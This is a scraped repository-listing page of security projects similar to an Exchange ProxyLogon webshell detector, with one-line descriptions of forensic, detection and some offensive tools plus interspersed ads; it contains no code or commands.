Detect webshells dropped on Microsoft Exchange servers exploited through "proxylogon" group of vulnerabilites (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
β99Mar 16, 2021Updated 5 years ago
Alternatives and similar repositories for exchange_webshell_detection
Users that are interested in exchange_webshell_detection are comparing it to the libraries listed below. We may earn a commission when you buy through links labeled 'Ad' on this page.
Sorting:
- π¦π¬A small PowerShell tool for finding information quickly on malicious IPs or FQDNs. Powershell threat hunting.β11Jan 9, 2020Updated 6 years ago
- A scanner to detect the use of stolen FireEye red team toolsβ20Dec 18, 2020Updated 5 years ago
- KQL queries for Microsoft Defender Advanced Hunting organized around the TTPs of the MITRE ATT&CK framework.β19Nov 7, 2024Updated last year
- A series of PowerShell scripts to automate collection of forensic artefacts in most Incident Response environmentsβ65Jan 31, 2022Updated 4 years ago
- β191Nov 19, 2025Updated 4 months ago
- Wordpress hosting with auto-scaling on Cloudways β’ AdFully Managed hosting built for WordPress-powered businesses that need reliable, auto-scalable hosting. Cloudways SafeUpdates now available.
- Deletes old versions of OWA and ECP versions of Exchange Serverβ12Dec 7, 2021Updated 4 years ago
- Exploit and detect tools for CVE-2020-0688β356Mar 21, 2020Updated 6 years ago
- Detection Ideas & Rules repository.β178Sep 10, 2021Updated 4 years ago
- β21Oct 22, 2019Updated 6 years ago
- CVE-2024-23897 jenkins-cliβ15Jan 27, 2024Updated 2 years ago
- incident response scriptsβ18Mar 4, 2019Updated 7 years ago
- Conti V3 source code updatedβ11Jun 30, 2022Updated 3 years ago
- AntSword εΊη½ζ’ζ΅ζδ»Άβ22Jul 6, 2022Updated 3 years ago
- Exchange Server support tools and scriptsβ1,276Mar 17, 2026Updated 3 weeks ago
- Proton VPN Special Offer - Get 70% off β’ AdSpecial partner offer. Trusted by over 100 million users worldwide. Tested, Approved and Recommended by Experts.
- A tool to find/download malware samples from various public repositoriesβ12Dec 22, 2021Updated 4 years ago
- C# POC code for the SessionEnv dll hijack by utilizing called functions of TSMSISrv.dllβ62Apr 18, 2019Updated 6 years ago
- Malware similarity platform with modularity in mind.β80Jul 18, 2021Updated 4 years ago
- Post exploitation tool for configuration management servers.β77Jan 29, 2026Updated 2 months ago
- β71Feb 15, 2021Updated 5 years ago
- C code to enable ETW tracing for Dotnet Assembliesβ32Aug 12, 2022Updated 3 years ago
- A collection of tools adversaries commonly use in an attack.β15Nov 23, 2024Updated last year
- Mitigation validation utility for the Ivanti Connect Around attack chain. Runs multiple checks. CVE-2023-46805, CVE-2024-21887.β12Feb 3, 2024Updated 2 years ago
- εΊδΊζ³¨ε葨ε«ζBypassUACβ28Dec 16, 2020Updated 5 years ago
- Managed hosting for WordPress and PHP on Cloudways β’ AdManaged hosting with the flexibility to host WordPress, Magento, Laravel, or PHP apps, on multiple cloud providers. Cloudways by DigitalOcean.
- β645Jun 6, 2023Updated 2 years ago
- DeepToad is a library and a tool to clusterize similar files using fuzzy hashingβ20Apr 5, 2020Updated 6 years ago
- Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump inβ¦β270Mar 18, 2021Updated 5 years ago
- Dump stuff without touching diskβ165Oct 29, 2020Updated 5 years ago
- Simple yara rule managerβ67Dec 27, 2022Updated 3 years ago
- ReWrite of AChoir in Go for Cross Platform forensic artifact collection and processingβ41Feb 28, 2026Updated last month
- Invoke-Forensics provides PowerShell commands to simplify working with the forensic tools KAPE and RegRipper.β118Nov 28, 2023Updated 2 years ago
- β13Feb 6, 2018Updated 8 years ago
- DFIRTrack - The Incident Response Tracking Applicationβ534Jan 13, 2026Updated 2 months ago
- End-to-end encrypted cloud storage - Proton Drive β’ AdSpecial offer: 40% Off Yearly / 80% Off First Month. Protect your most important files, photos, and documents from prying eyes.
- Collect-MemoryDump - Automated Creation of Windows Memory Snapshots for DFIRβ255Oct 29, 2025Updated 5 months ago
- β28Mar 29, 2022Updated 4 years ago
- Ansible scripts to build an attack boxβ24Sep 24, 2018Updated 7 years ago
- Collection of videos of Raids on Cybercriminalsβ22Mar 19, 2025Updated last year
- Convert Empire profiles to Apache mod_rewrite scriptsβ29Sep 17, 2019Updated 6 years ago
- Explore Indicators of Compromise Automaticallyβ97Feb 27, 2020Updated 6 years ago
- Mole is a framework for identifying and exploiting out-of-band application vulnerabilities.β58Aug 6, 2020Updated 5 years ago